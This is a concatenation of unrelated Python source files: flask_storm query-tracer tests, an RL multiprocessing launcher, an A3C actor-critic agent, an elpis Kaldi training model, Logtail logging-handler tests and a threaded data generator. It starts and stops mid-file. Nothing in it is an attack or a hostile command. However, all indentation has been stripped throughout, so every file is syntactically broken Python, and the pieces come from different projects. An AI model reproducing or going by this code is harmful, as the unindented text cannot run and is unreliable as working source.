assert isinstance(first.start_time, datetime)
assert isinstance(first.end_time, datetime)
assert isinstance(first.duration, timedelta)
assert second.statement == "SELECT ? + ?"
assert second.params == [1, 2]
def test_debug_query():
data = (
"SELECT 1",
(),
datetime(2000, 1, 1),
datetime(2000, 1, 1, second=1))
dq = DebugQuery(*data)
for i, value in enumerate(data):
assert dq[i] == value
def test_debug_query_keys():
dq = DebugQuery(
"SELECT 1",
(),
datetime(2000, 1, 1),
datetime(2000, 1, 1, second=1))
assert dq.statement == "SELECT 1"
assert dq.params == ()
assert dq.start_time == datetime(2000, 1, 1)
assert dq.end_time == datetime(2000, 1, 1, second=1)
assert dq.duration == timedelta(seconds=1)
@require("flask_storm")
def test_tracer_thread_isolation(app, app_context):
with DebugTracer():
store.execute("SELECT 'this'")
# Spawn a separate thread that also executes a query
def other_request():
with app.app_context():
store.execute("SELECT 'other'")
# Ensure main thread does not leak into this one
queries = get_debug_queries()
assert len(queries) == 1
assert queries[0].statement == "SELECT 'other'"
t = Thread(target=other_request)
t.start()
t.join()
# Ensure query log was not polluted by other thread
queries = get_debug_queries()
assert len(queries) == 1
assert queries[0].statement == "SELECT 'this'"
def test_get_debug_queries_no_context():
assert get_debug_queries() == []
def test_query_without_context(app):
fs = FlaskStorm(app)
try:
store = fs.connect()
with DebugTracer():
store.execute("SELECT 1")
# Since no application context is available queries are not saved
# anywhere
assert get_debug_queries() == []
finally:
store.close()
@require("app_context", "flask_storm")
def test_query_error():
try:
with DebugTracer():
store.execute("SELECT !")
except Exception:
pass
queries = get_debug_queries()
assert len(queries) == 1
assert queries[0].statement == "SELECT !"
@require_sqlparse
@require("app_context", "flask_storm")
def test_shell_tracer():
# Alias helper functions
remove_whitespace = pytest.helpers.remove_whitespace
remove_ansi = pytest.helpers.remove_ansi
sql = "SELECT 1 + 1 FROM (SELECT 2 + 2)"
output = StringIO()
output.isatty = MagicMock(return_value=True)
with patch("sys.platform", "linux2"), ShellTracer(file=output, fancy=True):
store.execute(sql)
color_output = output.getvalue()
output.close()
assert color_output != sql
assert \
remove_whitespace(remove_ansi(color_output)).rsplit(";", 1)[0] == \
remove_whitespace(sql)
output = StringIO()
output.isatty = MagicMock(return_value=False)
with ShellTracer(file=output, fancy=False):
store.execute(sql)
colorless_output = output.getvalue()
output.close()
assert color_output != colorless_output
assert \
remove_ansi(color_output).rsplit(";", 1)[0] == \
colorless_output.rsplit(";", 1)[0]
assert \
remove_whitespace(remove_ansi(color_output)).rsplit(";", 1)[0] == \
remove_whitespace(sql)
def test_shell_tracer_defaults():
st = ShellTracer()
assert st.file is sys.stdout
assert st.fancy
@require("app_context", "flask_storm")
def test_shell_tracer_success():
output = StringIO()
with ShellTracer(file=output, fancy=False):
store.execute("SELECT 1")
assert "SUCCESS" in output.getvalue()
output.close()
@require("app_context", "flask_storm")
def test_shell_tracer_failure():
output = StringIO()
with ShellTracer(file=output, fancy=False), pytest.raises(Exception):
store.execute("SELECT !")
assert "FAILURE" in output.getvalue()
output.close()
|
master.py
|
from builtins import str
from builtins import range
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import multiprocessing
import os, sys, time
from config import config, log_config
import util
AGENT_COUNT = config["agent_config"]["count"]
EVALUATOR_COUNT = config["evaluator_config"]["count"]
MODEL_AUGMENTED = config["model_config"] is not False
if config["resume"]:
ROOT_PATH = "output/" + config["env"]["name"] + "/" + config["name"]
else:
ROOT_PATH = util.create_and_wipe_directory("output/" + config["env"]["name"] + "/" + config["name"])
log_config()
import learner, agent, valuerl_learner
if MODEL_AUGMENTED: import worldmodel_learner
if __name__ == '__main__':
all_procs = set([])
interaction_procs = set([])
# lock
policy_lock = multiprocessing.Lock()
model_lock = multiprocessing.Lock() if MODEL_AUGMENTED else None
# queue
policy_replay_frame_queue = multiprocessing.Queue(1)
model_replay_frame_queue = multiprocessing.Queue(1) if MODEL_AUGMENTED else None
# interactors
for interact_proc_i in range(AGENT_COUNT):
interact_proc = multiprocessing.Process(target=agent.main, args=(interact_proc_i, False, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config))
all_procs.add(interact_proc)
interaction_procs.add(interact_proc)
# evaluators
for interact_proc_i in range(EVALUATOR_COUNT):
interact_proc = multiprocessing.Process(target=agent.main, args=(interact_proc_i, True, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config))
all_procs.add(interact_proc)
interaction_procs.add(interact_proc)
# policy training
train_policy_proc = multiprocessing.Process(target=learner.run_learner, args=(valuerl_learner.ValueRLLearner, policy_replay_frame_queue, policy_lock, config, config["env"], config["policy_config"]), kwargs={"model_lock": model_lock})
all_procs.add(train_policy_proc)
# model training
if MODEL_AUGMENTED:
train_model_proc = multiprocessing.Process(target=learner.run_learner, args=(worldmodel_learner.WorldmodelLearner, model_replay_frame_queue, model_lock, config, config["env"], config["model_config"]))
all_procs.add(train_model_proc)
# start all policies
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
for i, proc in enumerate(interaction_procs):
os.environ['CUDA_VISIBLE_DEVICES'] = ''
proc.start()
os.environ['CUDA_VISIBLE_DEVICES'] = str(int(sys.argv[2]))
train_policy_proc.start()
if MODEL_AUGMENTED:
os.environ['CUDA_VISIBLE_DEVICES'] = str(1+int(sys.argv[2]))
train_model_proc.start()
# Keep the master process alive; join all children when interrupted.
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
for proc in all_procs: proc.join()
|
A3C.py
|
import copy
import random
import time
import numpy as np
import torch
from torch import multiprocessing
from torch.multiprocessing import Queue
from torch.optim import Adam
from agents.Base_Agent import Base_Agent
from utilities.Utility_Functions import create_actor_distribution, SharedAdam
class A3C(Base_Agent):
"""Actor critic A3C algorithm from deepmind paper https://arxiv.org/pdf/1602.01783.pdf"""
agent_name = "A3C"
def __init__(self, config):
super(A3C, self).__init__(config)
self.num_processes = multiprocessing.cpu_count()
self.worker_processes = max(1, self.num_processes - 2)
self.actor_critic = self.create_NN(input_dim=self.state_size, output_dim=[self.action_size, 1])
self.actor_critic_optimizer = SharedAdam(self.actor_critic.parameters(), lr=self.hyperparameters["learning_rate"], eps=1e-4)
def run_n_episodes(self):
"""Runs game to completion n times and then summarises results and saves model (if asked to)"""
start = time.time()
results_queue = Queue()
gradient_updates_queue = Queue()
episode_number = multiprocessing.Value('i', 0)
self.optimizer_lock = multiprocessing.Lock()
episodes_per_process = int(self.config.num_episodes_to_run / self.worker_processes) + 1
processes = []
self.actor_critic.share_memory()
self.actor_critic_optimizer.share_memory()
optimizer_worker = multiprocessing.Process(target=self.update_shared_model, args=(gradient_updates_queue,))
optimizer_worker.start()
for process_num in range(self.worker_processes):
worker = Actor_Critic_Worker(process_num, copy.deepcopy(self.environment), self.actor_critic, episode_number, self.optimizer_lock,
self.actor_critic_optimizer, self.config, episodes_per_process,
self.hyperparameters["epsilon_decay_rate_denominator"],
self.action_size, self.action_types,
results_queue, copy.deepcopy(self.actor_critic), gradient_updates_queue)
worker.start()
processes.append(worker)
self.print_results(episode_number, results_queue)
for worker in processes:
worker.join()
optimizer_worker.kill()
time_taken = time.time() - start
return self.game_full_episode_scores, self.rolling_results, time_taken
def print_results(self, episode_number, results_queue):
"""Worker that prints out results as they get put into a queue"""
while True:
with episode_number.get_lock():
carry_on = episode_number.value < self.config.num_episodes_to_run
if carry_on:
if not results_queue.empty():
self.total_episode_score_so_far = results_queue.get()
self.save_and_print_result()
else: break
def update_shared_model(self, gradient_updates_queue):
"""Worker that updates the shared model with gradients as they get put into the queue"""
while True:
gradients = gradient_updates_queue.get()
with self.optimizer_lock:
self.actor_critic_optimizer.zero_grad()
for grads, params in zip(gradients, self.actor_critic.parameters()):
params._grad = grads # maybe need to do grads.clone()
self.actor_critic_optimizer.step()
class Actor_Critic_Worker(torch.multiprocessing.Process):
"""Actor critic worker that will play the game for the designated number of episodes """
def __init__(self, worker_num, environment, shared_model, counter, optimizer_lock, shared_optimizer,
config, episodes_to_run, epsilon_decay_denominator, action_size, action_types, results_queue,
local_model, gradient_updates_queue):
super(Actor_Critic_Worker, self).__init__()
self.environment = environment
self.config = config
self.worker_num = worker_num
self.gradient_clipping_norm = self.config.hyperparameters["gradient_clipping_norm"]
self.discount_rate = self.config.hyperparameters["discount_rate"]
self.normalise_rewards = self.config.hyperparameters["normalise_rewards"]
self.action_size = action_size
self.set_seeds(self.worker_num)
self.shared_model = shared_model
self.local_model = local_model
self.local_optimizer = Adam(self.local_model.parameters(), lr=0.0, eps=1e-4)
self.counter = counter
self.optimizer_lock = optimizer_lock
self.shared_optimizer = shared_optimizer
self.episodes_to_run = episodes_to_run
self.epsilon_decay_denominator = epsilon_decay_denominator
self.exploration_worker_difference = self.config.hyperparameters["exploration_worker_difference"]
self.action_types = action_types
self.results_queue = results_queue
self.episode_number = 0
self.gradient_updates_queue = gradient_updates_queue
def set_seeds(self, worker_num):
"""Sets random seeds for this worker"""
torch.manual_seed(self.config.seed + worker_num)
self.environment.seed(self.config.seed + worker_num)
def run(self):
"""Starts the worker"""
for ep_ix in range(self.episodes_to_run):
with self.optimizer_lock:
Base_Agent.copy_model_over(self.shared_model, self.local_model)
epsilon_exploration = self.calculate_new_exploration()
state = self.reset_game_for_worker()
done = False
self.episode_states = []
self.episode_actions = []
self.episode_rewards = []
self.episode_log_action_probabilities = []
self.critic_outputs = []
while not done:
action, action_log_prob, critic_outputs = self.pick_action_and_get_critic_values(self.local_model, state, epsilon_exploration)
next_state, reward, done, _ = self.environment.step(action)
self.episode_states.append(state)
self.episode_actions.append(action)
self.episode_rewards.append(reward)
self.episode_log_action_probabilities.append(action_log_prob)
self.critic_outputs.append(critic_outputs)
state = next_state
total_loss = self.calculate_total_loss()
self.put_gradients_in_queue(total_loss)
self.episode_number += 1
with self.counter.get_lock():
self.counter.value += 1
self.results_queue.put(np.sum(self.episode_rewards))
def calculate_new_exploration(self):
"""Calculates the new exploration parameter epsilon. It picks a random point within 3X above and below the
current epsilon"""
with self.counter.get_lock():
epsilon = 1.0 / (1.0 + (self.counter.value / self.epsilon_decay_denominator))
epsilon = max(0.0, random.uniform(epsilon / self.exploration_worker_difference, epsilon * self.exploration_worker_difference))
return epsilon
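# Worked example (assuming exploration_worker_difference == 3): with a global
# episode counter of 0 the base epsilon is 1.0, so the worker samples epsilon
# uniformly from [1/3, 3]; as the counter grows, the base epsilon and hence
# the sampled range shrink towards 0.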
def reset_game_for_worker(self):
"""Resets the game environment so it is ready to play a new episode"""
state = self.environment.reset()
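# Note: for continuous action spaces the line below assumes a noise process
# (self.noise, e.g. OU noise) has been attached to this worker elsewhere; it
# is not created in __init__ above.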
if self.action_types == "CONTINUOUS": self.noise.reset()
return state
def pick_action_and_get_critic_values(self, policy, state, epsilon_exploration=None):
"""Picks an action using the policy"""
state = torch.from_numpy(state).float().unsqueeze(0)
model_output = policy.forward(state)
actor_output = model_output[:, list(range(self.action_size))] #we only use first set of columns to decide action, last column is state-value
critic_output = model_output[:, -1]
action_distribution = create_actor_distribution(self.action_types, actor_output, self.action_size)
action = action_distribution.sample().cpu().numpy()
if self.action_types == "CONTINUOUS": action += self.noise.sample()
if self.action_types == "DISCRETE":
if random.random() <= epsilon_exploration:
action = random.randint(0, self.action_size - 1)
else:
action = action[0]
action_log_prob = self.calculate_log_action_probability(action, action_distribution)
return action, action_log_prob, critic_output
def calculate_log_action_probability(self, actions, action_distribution):
"""Calculates the log probability of the chosen action"""
policy_distribution_log_prob = action_distribution.log_prob(torch.Tensor([actions]))
return policy_distribution_log_prob
def calculate_total_loss(self):
"""Calculates the actor loss + critic loss"""
discounted_returns = self.calculate_discounted_returns()
if self.normalise_rewards:
discounted_returns = self.normalise_discounted_returns(discounted_returns)
critic_loss, advantages = self.calculate_critic_loss_and_advantages(discounted_returns)
actor_loss = self.calculate_actor_loss(advantages)
total_loss = actor_loss + critic_loss
return total_loss
def calculate_discounted_returns(self):
"""Calculates the cumulative discounted return for an episode which we will then use in a learning iteration"""
discounted_returns = [0]
for ix in range(len(self.episode_states)):
return_value = self.episode_rewards[-(ix + 1)] + self.discount_rate*discounted_returns[-1]
discounted_returns.append(return_value)
discounted_returns = discounted_returns[1:]
discounted_returns = discounted_returns[::-1]
return discounted_returns
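# Worked example (assumed values): with episode_rewards == [1, 1, 1] and
# discount_rate == 0.9 the loop builds [0, 1, 1.9, 2.71] back to front, drops
# the leading 0 and reverses, giving discounted returns [2.71, 1.9, 1.0] for
# the first, second and third step respectively.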
def normalise_discounted_returns(self, discounted_returns):
"""Normalises the discounted returns by dividing by mean and std of returns that episode"""
mean = np.mean(discounted_returns)
std = np.std(discounted_returns)
discounted_returns -= mean
discounted_returns /= (std + 1e-5)
return discounted_returns
def calculate_critic_loss_and_advantages(self, all_discounted_returns):
"""Calculates the critic's loss and the advantages"""
critic_values = torch.cat(self.critic_outputs)
advantages = torch.Tensor(all_discounted_returns) - critic_values
advantages = advantages.detach()
critic_loss = (torch.Tensor(all_discounted_returns) - critic_values)**2
critic_loss = critic_loss.mean()
return critic_loss, advantages
def calculate_actor_loss(self, advantages):
"""Calculates the loss for the actor"""
action_log_probabilities_for_all_episodes = torch.cat(self.episode_log_action_probabilities)
actor_loss = -1.0 * action_log_probabilities_for_all_episodes * advantages
actor_loss = actor_loss.mean()
return actor_loss
def put_gradients_in_queue(self, total_loss):
"""Puts gradients in a queue for the optimisation process to use to update the shared model"""
self.local_optimizer.zero_grad()
total_loss.backward()
torch.nn.utils.clip_grad_norm_(self.local_model.parameters(), self.gradient_clipping_norm)
gradients = [param.grad for param in self.local_model.parameters()]
self.gradient_updates_queue.put(gradients)
|
model.py
|
import os
import re
import shutil
from pathlib import Path
from typing import Callable, Dict, Tuple
import threading
from elpis.engines.common.objects.command import run
from elpis.engines.common.objects.model import Model as BaseModel
from elpis.engines.common.objects.dataset import Dataset
from elpis.engines.common.objects.pron_dict import PronDict
from elpis.engines.kaldi.input.json_to_kaldi import create_kaldi_structure
from elpis.engines.common.objects.path_structure import PathStructure
from collections import OrderedDict
from subprocess import CalledProcessError
from jinja2 import Template
class KaldiModel(BaseModel): # TODO not thread safe
# _links = {**Model._links, **{"pron_dict": PronDict}}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pron_dict: PronDict = None
self.config['pron_dict_name'] = None # pron_dict hash has not been linked
self.config['ngram'] = 1 # default to 1 to make playing quicker
self.config['engine_name'] = 'kaldi'
stage_names = {
"0_setup.sh": "setup",
"1_prep_acoustic.sh": "acousticPreparation",
"2_feature_ext.sh": "featureExtraction",
"3_prep_lang_data.sh": "dataPreparation",
"4_lang_model_cr.sh": "modelCreation",
"5_mono.sh": "monophoneTraining",
"6_tri1.sh": "triphoneTraining"
}
super().build_stage_status(stage_names)
@classmethod
def load(cls, base_path: Path):
self = super().load(base_path)
self.pron_dict = None
return self
def link_pron_dict(self, pron_dict: PronDict):
self.pron_dict = pron_dict
self.config['pron_dict_name'] = pron_dict.name
@property
def ngram(self) -> int:
return int(self.config['ngram'])
@ngram.setter
def ngram(self, value: int) -> None:
self.config['ngram'] = value
def build_structure(self):
# task json-to-kaldi
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# Copy cleaned corpus from dataset to the model
dataset_corpus_txt = self.dataset.path.joinpath('cleaned', 'corpus.txt')
model_corpus_txt = self.path.joinpath('corpus.txt')
if os.path.exists(dataset_corpus_txt):
shutil.copy(f"{dataset_corpus_txt}", f"{model_corpus_txt}")
create_kaldi_structure(
input_json=f'{self.dataset.pathto.annotation_json}',
output_folder=f'{output_path}',
silence_markers=False,
corpus_txt=f'{model_corpus_txt}'
)
def train(self, on_complete:Callable=None):
def prepare_for_training():
print("prepare_for_training")
# task make-kaldi-subfolders
kaldi_structure = PathStructure(self.path)
local_kaldi_path = self.path.joinpath('kaldi')
local_kaldi_path.mkdir(parents=True, exist_ok=True)
kaldi_data_local_dict = local_kaldi_path.joinpath('data', 'local', 'dict')
kaldi_data_local_dict.mkdir(parents=True, exist_ok=True)
kaldi_data_local = local_kaldi_path.joinpath('data', 'local')
kaldi_data_local.mkdir(parents=True, exist_ok=True)
kaldi_data_test = local_kaldi_path.joinpath('data', 'test')
kaldi_data_test.mkdir(parents=True, exist_ok=True)
kaldi_data_train = local_kaldi_path.joinpath('data', 'train')
kaldi_data_train.mkdir(parents=True, exist_ok=True)
kaldi_conf = local_kaldi_path.joinpath('conf')
kaldi_conf.mkdir(parents=True, exist_ok=True)
kaldi_local = local_kaldi_path.joinpath('local')
kaldi_local.mkdir(parents=True, exist_ok=True)
# copy the pron dict
shutil.copy(f"{self.pron_dict.lexicon_txt_path}", f"{kaldi_data_local_dict.joinpath('lexicon.txt')}")
# task generate-kaldi-configs
path_file_path = kaldi_structure.path.joinpath('path.sh')
mfcc_file_path = kaldi_structure.conf.joinpath('mfcc.conf')
decode_config_file_path = kaldi_structure.conf.joinpath('decode.config')
template_path = Path('/elpis/elpis/engines/kaldi/templates')
path_resource = template_path.joinpath('path.sh')
mfcc_resource = template_path.joinpath('mfcc.conf')
decode_config_resource = template_path.joinpath('decode.config')
# task make-nonsil-phones > {{ .KALDI_OUTPUT_PATH }}/tmp/nonsilence_phones.txt
nonsilence_phones_path = kaldi_data_local_dict.joinpath('nonsilence_phones.txt')
# build a unique, unsorted list of the phone symbols
# can't use sorting, because the rules may have order significance
# ignore comment lines that begin with #
seen = OrderedDict()
for line in open(self.pron_dict.l2s_path, "r"):
if line[0] == "#":
pass
else:
line = line.split()[1:]
if len(line) > 0:
line = line[0]
seen[line] = seen.get(line, 0) + 1
with nonsilence_phones_path.open(mode='w') as fout:
for (item, i) in seen.items():
fout.write("%s\n" % item)
with path_file_path.open(mode='w') as fout:
with path_resource.open() as fin:
content = Template(fin.read()).render(
{
'KALDI_ROOT': '/kaldi',
'HELPERS_PATH': '/kaldi-helpers',
'CORPUS_PATH': f'..{self.dataset.pathto.original}'
}
)
fout.write(content)
with mfcc_file_path.open(mode='w') as fout:
with mfcc_resource.open() as fin:
content = Template(fin.read()).render(
{
'MFCC_SAMPLE_FREQUENCY': '44100',
'MFCC_FRAME_LENGTH': '25',
'MFCC_LOW_FREQ': '20',
'MFCC_HIGH_FREQ': '22050',
'MFCC_NUM_CEPS': '7',
}
)
fout.write(content)
with decode_config_file_path.open(mode='w') as fout:
with decode_config_resource.open() as fin:
content = Template(fin.read()).render(
{
'DECODE_BEAM': '11.0',
'DECODE_FIRST_BEAM': '8.0'
}
)
fout.write(content)
try:
# task copy-generated-files
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# - cp {{ .KALDI_OUTPUT_PATH }}/tmp/json_splitted/training/corpus.txt {{ .KALDI_OUTPUT_PATH }}/kaldi/data/local/
shutil.move(f"{output_path.joinpath('training', 'corpus.txt')}", f"{kaldi_data_local}")
shutil.move(f"{output_path.joinpath('testing', 'segments')}", f"{kaldi_data_test.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('testing', 'text')}", f"{kaldi_data_test.joinpath('text')}")
shutil.move(f"{output_path.joinpath('testing', 'utt2spk')}", f"{kaldi_data_test.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('testing', 'wav.scp')}", f"{kaldi_data_test.joinpath('wav.scp')}")
shutil.move(f"{output_path.joinpath('training', 'segments')}", f"{kaldi_data_train.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('training', 'text')}", f"{kaldi_data_train.joinpath('text')}")
shutil.move(f"{output_path.joinpath('training', 'utt2spk')}", f"{kaldi_data_train.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('training', 'wav.scp')}", f"{kaldi_data_train.joinpath('wav.scp')}")
# task copy-phones-configs
optional_silence_file_path = kaldi_data_local_dict.joinpath('optional_silence.txt')
silence_phones_file_path = kaldi_data_local_dict.joinpath('silence_phones.txt')
with optional_silence_file_path.open(mode='w') as fout:
fout.write('SIL\n')
with silence_phones_file_path.open(mode='w') as fout:
fout.write('SIL\nsil\nspn\n')
shutil.copy(f"{template_path.joinpath('cmd.sh')}", f"{local_kaldi_path}")
shutil.copytree(f"{template_path.joinpath('stages')}", local_kaldi_path.joinpath('stages'))
for file in os.listdir(local_kaldi_path.joinpath('stages')):
os.chmod(local_kaldi_path.joinpath('stages').joinpath(file), 0o774)
shutil.copy(f"{template_path.joinpath('score.sh')}", f"{kaldi_local}")
run(f"cp -L -r /kaldi/egs/wsj/s5/steps {local_kaldi_path}/steps")
run(f"cp -L -r /kaldi/egs/wsj/s5/utils {local_kaldi_path}/utils")
# modified extract-wavs
for audio_file in os.listdir(self.dataset.pathto.resampled):
src = f'{self.dataset.pathto.resampled.joinpath(audio_file)}'
dst = f'{local_kaldi_path}'
shutil.copy(src, dst)
print('kaldi dirs preparation done.')
except OSError as error:
print("couldn't prepare kaldi dirs: ", error)
def train():
local_kaldi_path = self.path.joinpath('kaldi')
# Prepare (dump, recreate) main train log file
run_log_path = self.path.joinpath('train.log')
if os.path.isfile(run_log_path):
os.remove(run_log_path)
run(f"touch {run_log_path};")
# Organise stage logs in a dir
train_log_dir = self.path.joinpath('train-logs')
if os.path.exists(train_log_dir):
shutil.rmtree(train_log_dir)
os.mkdir(train_log_dir)
stage_count = 0
stages = os.listdir(local_kaldi_path.joinpath('stages'))
for stage in sorted(stages):
print(f"Stage {stage} starting")
self.stage_status = (stage, 'in-progress', '', 'starting')
# Create log file
stage_log_path = self.path.joinpath(os.path.join(train_log_dir, f'stage_{stage_count}.log'))
with open(stage_log_path, 'w+'):
pass
# Manipulate stage templates with user-defined settings
# TODO replace with jinja templates or something similar
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'r') as file:
filedata = file.read()
# Add settings to replace here
filedata = filedata.replace('lm_order=1', f'lm_order={self.ngram}')
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'w') as file:
file.write(filedata)
# Run the command, log output. Also redirect Kaldi stderr output to the log; these are often not errors :-(
try:
stage_process = run(f"cd {local_kaldi_path}; stages/{stage} &> {stage_log_path}")
print('done')
print(f"Stage {stage} complete")
with open(stage_log_path, 'r') as file:
stage_log = file.read()
print(f"Stage {stage} log", stage_log)
self.stage_status = (stage, 'complete', '', stage_log)
# add to stage_log
stage_count = stage_count + 1
except CalledProcessError as error:
with open(stage_log_path, 'a+') as file:
print('stderr', error.stderr, file=file)
print('failed', file=file)
print(f"Stage {stage} failed")
self.stage_status = (stage, 'failed', '', 'LOG-C')
break
self.log = ''
# Concat all the files in the train-log dir
log_filenames = os.listdir(train_log_dir)
log_filenames.sort()
with open(run_log_path, 'w') as outfile:
for log_file in log_filenames:
with open(os.path.join(train_log_dir, log_file)) as infile:
log_contents = infile.read()
outfile.write(log_contents)
outfile.write("\n")
self.log += log_contents
def run_training_in_background():
def background_train_task():
prepare_for_training()
train()
self.status = 'trained'
self.results = KaldiModel.get_train_results(self)
on_complete()
self.status = 'training'
t = threading.Thread(target=background_train_task)
t.start()
if on_complete is None:
self.status = 'training'
prepare_for_training()
train()
self.status = 'trained'
self.results = KaldiModel.get_train_results(self)
else:
run_training_in_background()
return
def get_train_results(self):
log_file = self.path.joinpath('train.log')
results = {}
with log_file.open() as fin:
wer_lines = []
for line in reversed(list(fin)):
line = line.rstrip()
if "%WER" in line:
# use line to sort by best val
line_r = line.replace('%WER ', '')
wer_lines.append(line_r)
wer_lines.sort(reverse=True)
line = wer_lines[0]
line_split = line.split(None, 1)
wer = line_split[0]
line_results = line_split[1]
line_results = re.sub(r"[\[\]]", "", line_results)
results_split = line_results.split(',')
count_val = results_split[0].strip()
ins_val = results_split[1].replace(' ins', '').strip()
del_val = results_split[2].replace(' del', '').strip()
sub_val = results_split[3].replace(' sub', '').strip()
results = {"comparison_val": float(wer), # property common to all engines so the GUI can sort models by a result value
"wer": float(wer),
"count_val": str(count_val),
"ins_val": int(ins_val),
"del_val": int(del_val),
"sub_val": int(sub_val)}
print(results)
return results
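# Illustrative example (assumed log line; real Kaldi scoring lines may carry a
# trailing path): a line such as
#   %WER 43.75 [ 7 / 16, 1 ins, 2 del, 4 sub ]
# would be parsed by the code above into
#   {"comparison_val": 43.75, "wer": 43.75, "count_val": "7 / 16",
#    "ins_val": 1, "del_val": 2, "sub_val": 4}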
|
test_handler.py
|
# coding: utf-8
from __future__ import print_function, unicode_literals
import mock
import time
import threading
import unittest2
import logging
from logtail.handler import LogtailHandler
class TestLogtailHandler(unittest2.TestCase):
source_token = 'dummy_source_token'
host = 'dummy_host'
@mock.patch('logtail.handler.FlushWorker')
def test_handler_creates_uploader_from_args(self, MockWorker):
handler = LogtailHandler(source_token=self.source_token, host=self.host)
self.assertEqual(handler.uploader.source_token, self.source_token)
self.assertEqual(handler.uploader.host, self.host)
@mock.patch('logtail.handler.FlushWorker')
def test_handler_creates_pipe_from_args(self, MockWorker):
buffer_capacity = 9
flush_interval = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
flush_interval=flush_interval
)
self.assertEqual(handler.pipe._maxsize, buffer_capacity)
@mock.patch('logtail.handler.FlushWorker')
def test_handler_creates_and_starts_worker_from_args(self, MockWorker):
buffer_capacity = 9
flush_interval = 9
handler = LogtailHandler(source_token=self.source_token, buffer_capacity=buffer_capacity, flush_interval=flush_interval)
MockWorker.assert_called_with(
handler.uploader,
handler.pipe,
buffer_capacity,
flush_interval
)
self.assertTrue(handler.flush_thread.start.called)
@mock.patch('logtail.handler.FlushWorker')
def test_emit_starts_thread_if_not_alive(self, MockWorker):
handler = LogtailHandler(source_token=self.source_token)
self.assertEqual(handler.flush_thread.start.call_count, 1)
handler.flush_thread.is_alive = mock.Mock(return_value=False)
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
logger.critical('hello')
self.assertEqual(handler.flush_thread.start.call_count, 2)
@mock.patch('logtail.handler.FlushWorker')
def test_emit_drops_records_if_configured(self, MockWorker):
buffer_capacity = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
drop_extra_events=True
)
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
logger.critical('hello')
logger.critical('goodbye')
log_entry = handler.pipe.get()
self.assertEqual(log_entry['message'], 'hello')
self.assertTrue(handler.pipe.empty())
self.assertEqual(handler.dropcount, 1)
@mock.patch('logtail.handler.FlushWorker')
def test_emit_does_not_drop_records_if_configured(self, MockWorker):
buffer_capacity = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
drop_extra_events=False
)
def consumer(q):
while True:
if q.full():
while not q.empty():
_ = q.get(block=True)
time.sleep(.2)
t = threading.Thread(target=consumer, args=(handler.pipe,))
t.daemon = True
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
logger.critical('hello')
self.assertTrue(handler.pipe.full())
t.start()
logger.critical('goodbye')
logger.critical('goodbye2')
self.assertEqual(handler.dropcount, 0)
@mock.patch('logtail.handler.FlushWorker')
def test_error_suppression(self, MockWorker):
buffer_capacity = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
raise_exceptions=True
)
handler.pipe = mock.MagicMock(put=mock.Mock(side_effect=ValueError))
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
with self.assertRaises(ValueError):
logger.critical('hello')
handler.raise_exceptions = False
logger.critical('hello')
|
generator.py
|
from __future__ import division, print_function
import contextlib
import os
import threading
import time
if not hasattr(contextlib, 'ExitStack'):
import contextlib2 as contextlib
import numpy as np
try:
import queue
except ImportError:
import Queue as queue
from visual_dynamics.utils.container import ImageDataContainer
from visual_dynamics.utils.transformer import Transformer, OpsTransformer, ImageTransformer, CompositionTransformer
# generator_queue copied from Keras library: https://github.com/fchollet/keras/blob/master/keras/models.py
def generator_queue(generator, max_q_size=10, wait_time=0.05, nb_worker=1):
q = queue.Queue()
_stop = threading.Event()
def data_generator_task():
while not _stop.is_set():
try:
if q.qsize() < max_q_size:
try:
generator_output = next(generator)
# indices_generator
except StopIteration:
_stop.set()
break
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
generator_threads = [threading.Thread(target=data_generator_task)
for _ in range(nb_worker)]
for thread in generator_threads:
thread.daemon = True
thread.start()
return q, _stop, generator_threads
class ParallelGenerator(object):
def __init__(self, generator, max_q_size=10, wait_time=0.05, nb_worker=1):
self.wait_time = wait_time
self.data_gen_queue, self._data_stop, self.generator_threads = \
generator_queue(generator, max_q_size=max_q_size, wait_time=wait_time, nb_worker=nb_worker)
self._size = generator.size
def __iter__(self):
return self
def __next__(self):
while not self._data_stop.is_set() or not self.data_gen_queue.empty() or \
any([thread.is_alive() for thread in self.generator_threads]):
if not self.data_gen_queue.empty():
return self.data_gen_queue.get()
else:
time.sleep(self.wait_time)
raise StopIteration
def next(self):
# python 2 compatible
return self.__next__()
def __del__(self):
self._data_stop.set()
for thread in self.generator_threads:
thread.join()
@property
def size(self):
return self._size
class DataGenerator(object):
def __init__(self, container_fnames, data_name_offset_pairs, transformers=None, once=False, batch_size=0, shuffle=False, dtype=None):
"""
Iterate through all the data once or indefinitely. The data from
contiguous files are treated as if they are contiguous. All of the
returned minibatches contain batch_size data points. If shuffle=True,
the data is iterated in a random order, and this order differs for each
pass of the data.
Note: this is not as efficient as it could be when shuffle=False since
each data point is retrieved one by one regardless of the value of
shuffle.
A batch_size of 0 means that data of batch size 1 is returned, but with the
